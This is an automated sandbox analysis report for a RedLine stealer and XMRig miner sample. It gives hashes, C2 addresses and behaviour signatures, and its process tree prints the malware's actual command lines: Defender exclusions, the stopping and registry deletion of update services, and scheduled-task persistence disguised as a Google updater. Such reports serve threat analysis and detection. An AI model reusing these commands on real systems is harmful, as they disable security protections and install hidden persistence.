Analysis

  • max time kernel
    150s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-10-2022 14:42

General

  • Target

    file.exe

  • Size

    354KB

  • MD5

    d88420c2434798988676e6f9701366e3

  • SHA1

    cbc43218d94beb38e0af53ae7bcde9d8b60cb86b

  • SHA256

    0963fff5b1b19e7da2d72f54f54a5369ac466f0c8b76329ba70fd1c464858f9f

  • SHA512

    f40ecf553b25a4fdf4a88db37bb38866e09b2dbbc6807e0c4a1e66a807bca2fde775a44e3c512df8746347db279ca810892b63713ada65f58a4795e467fc338a

  • SSDEEP

    6144:2/3FwJdK4oe0M/+FPwFvE+eKp9nq0AOE553Bais8VFQ3nFYr7B5Rrh:QwJdK4oegFP4N+3BPtK3FWB7rh

Malware Config

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

C2

51.89.201.21:7161

Attributes
  • auth_value

    3a050df92d0cf082b2cdaf87863616be

Extracted

Family

redline

Botnet

875784825

C2

79.137.192.6:8362

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • XMRig Miner payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 9 IoCs
  • Stops running service(s) 3 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Themida packer 21 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Uses the VBS compiler for execution 1 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 6 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3436
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      2⤵
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1660
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bestrealprizes.life/?u=lq1pd08&o=hdck0gl
        3⤵
        • Adds Run key to start application
        • Enumerates system info in registry
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:4192
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ffe999d46f8,0x7ffe999d4708,0x7ffe999d4718
          4⤵
            PID:4204
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
            4⤵
              PID:5092
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:4748
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
              4⤵
                PID:468
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3856 /prefetch:1
                4⤵
                  PID:3972
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:1
                  4⤵
                    PID:4700
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5332 /prefetch:8
                    4⤵
                      PID:2704
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
                      4⤵
                        PID:2748
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:1
                        4⤵
                          PID:2864
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1
                          4⤵
                            PID:5060
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3916 /prefetch:8
                            4⤵
                              PID:3068
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1
                              4⤵
                                PID:4880
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6176 /prefetch:1
                                4⤵
                                  PID:3180
                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5572 /prefetch:8
                                  4⤵
                                    PID:4400
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                    4⤵
                                    • Drops file in Program Files directory
                                    PID:492
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1f8,0x22c,0x7ff6322d5460,0x7ff6322d5470,0x7ff6322d5480
                                      5⤵
                                        PID:852
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5572 /prefetch:8
                                      4⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1820
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1888 /prefetch:8
                                      4⤵
                                        PID:3652
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3164 /prefetch:8
                                        4⤵
                                          PID:5200
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3136 /prefetch:8
                                          4⤵
                                            PID:5264
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
                                            4⤵
                                              PID:5596
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1700 /prefetch:8
                                              4⤵
                                                PID:5644
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1120 /prefetch:8
                                                4⤵
                                                  PID:5728
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3192 /prefetch:8
                                                  4⤵
                                                    PID:5820
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
                                                    4⤵
                                                      PID:5972
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,3811374690948016637,8567862023479583635,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5044 /prefetch:2
                                                      4⤵
                                                        PID:6548
                                                    • C:\Windows\SysWOW64\WScript.exe
                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\se21t2up.vbs"
                                                      3⤵
                                                      • Blocklisted process makes network request
                                                      PID:3692
                                                    • C:\Users\Admin\AppData\Local\Temp\setu2p.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\setu2p.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:1376
                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                                                        4⤵
                                                          PID:4980
                                                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                            5⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Drops file in Drivers directory
                                                            • Executes dropped EXE
                                                            • Checks BIOS information in registry
                                                            • Checks whether UAC is enabled
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Drops file in Program Files directory
                                                            PID:2816
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                              6⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4740
                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                              cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                              6⤵
                                                                PID:1692
                                                                • C:\Windows\system32\sc.exe
                                                                  sc stop UsoSvc
                                                                  7⤵
                                                                  • Launches sc.exe
                                                                  PID:3440
                                                                • C:\Windows\system32\sc.exe
                                                                  sc stop WaaSMedicSvc
                                                                  7⤵
                                                                  • Launches sc.exe
                                                                  PID:4692
                                                                • C:\Windows\system32\sc.exe
                                                                  sc stop wuauserv
                                                                  7⤵
                                                                  • Launches sc.exe
                                                                  PID:4332
                                                                • C:\Windows\system32\sc.exe
                                                                  sc stop bits
                                                                  7⤵
                                                                  • Launches sc.exe
                                                                  PID:4772
                                                                • C:\Windows\system32\sc.exe
                                                                  sc stop dosvc
                                                                  7⤵
                                                                  • Launches sc.exe
                                                                  PID:4320
                                                                • C:\Windows\system32\reg.exe
                                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                  7⤵
                                                                    PID:4288
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                    7⤵
                                                                      PID:3012
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                      7⤵
                                                                      • Modifies security service
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3816
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                      7⤵
                                                                        PID:4332
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                        7⤵
                                                                          PID:4496
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell <#bcatrumjd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                                                        6⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:720
                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                        cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                        6⤵
                                                                          PID:4148
                                                                          • C:\Windows\system32\powercfg.exe
                                                                            powercfg /x -hibernate-timeout-ac 0
                                                                            7⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4016
                                                                          • C:\Windows\system32\powercfg.exe
                                                                            powercfg /x -hibernate-timeout-dc 0
                                                                            7⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:3052
                                                                          • C:\Windows\system32\powercfg.exe
                                                                            powercfg /x -standby-timeout-ac 0
                                                                            7⤵
                                                                              PID:3816
                                                                            • C:\Windows\system32\powercfg.exe
                                                                              powercfg /x -standby-timeout-dc 0
                                                                              7⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4952
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell <#hyrgjwg#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                                                                            6⤵
                                                                              PID:2300
                                                                              • C:\Windows\system32\schtasks.exe
                                                                                "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                                                                                7⤵
                                                                                  PID:5068
                                                                            • C:\Users\Admin\AppData\Local\Temp\setup12.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\setup12.exe"
                                                                              5⤵
                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                              • Executes dropped EXE
                                                                              • Checks BIOS information in registry
                                                                              • Checks computer location settings
                                                                              • Identifies Wine through registry keys
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:3136
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
                                                                                6⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:4196
                                                                            • C:\Users\Admin\AppData\Local\Temp\setup1232.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\setup1232.exe"
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:4856
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                6⤵
                                                                                  PID:2580
                                                                              • C:\Users\Admin\AppData\Local\Temp\watchdog.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\watchdog.exe"
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:3012
                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                  6⤵
                                                                                    PID:105948
                                                                                    • C:\Users\Admin\AppData\Local\Temp\ChomiumPath.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\ChomiumPath.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4092
                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                        "cmd.exe" /C schtasks /create /tn \qnme49ij0f /tr "C:\Users\Admin\AppData\Roaming\qnme49ij0f\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                                                                                        8⤵
                                                                                          PID:3912
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks /create /tn \qnme49ij0f /tr "C:\Users\Admin\AppData\Roaming\qnme49ij0f\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                                                                                            9⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:5148
                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                            1⤵
                                                                              PID:4880
                                                                            • C:\Users\Admin\AppData\Local\cache\MoUSO.exe
                                                                              C:\Users\Admin\AppData\Local\cache\MoUSO.exe
                                                                              1⤵
                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                              • Executes dropped EXE
                                                                              • Checks BIOS information in registry
                                                                              • Identifies Wine through registry keys
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:2568
                                                                            • C:\Program Files\Google\Chrome\updater.exe
                                                                              "C:\Program Files\Google\Chrome\updater.exe"
                                                                              1⤵
                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                              • Drops file in Drivers directory
                                                                              • Executes dropped EXE
                                                                              • Checks BIOS information in registry
                                                                              • Checks whether UAC is enabled
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              • Suspicious use of SetThreadContext
                                                                              • Drops file in Program Files directory
                                                                              PID:872
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                2⤵
                                                                                • Drops file in System32 directory
                                                                                • Modifies data under HKEY_USERS
                                                                                PID:106128
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell <#bcatrumjd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                                                                2⤵
                                                                                • Drops file in System32 directory
                                                                                • Modifies data under HKEY_USERS
                                                                                PID:106328
                                                                              • C:\Windows\system32\cmd.exe
                                                                                cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                2⤵
                                                                                  PID:106304
                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                    powercfg /x -hibernate-timeout-ac 0
                                                                                    3⤵
                                                                                      PID:105956
                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                      powercfg /x -hibernate-timeout-dc 0
                                                                                      3⤵
                                                                                        PID:1084
                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                        powercfg /x -standby-timeout-ac 0
                                                                                        3⤵
                                                                                          PID:2764
                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                          powercfg /x -standby-timeout-dc 0
                                                                                          3⤵
                                                                                            PID:5112
                                                                                        • C:\Windows\system32\cmd.exe
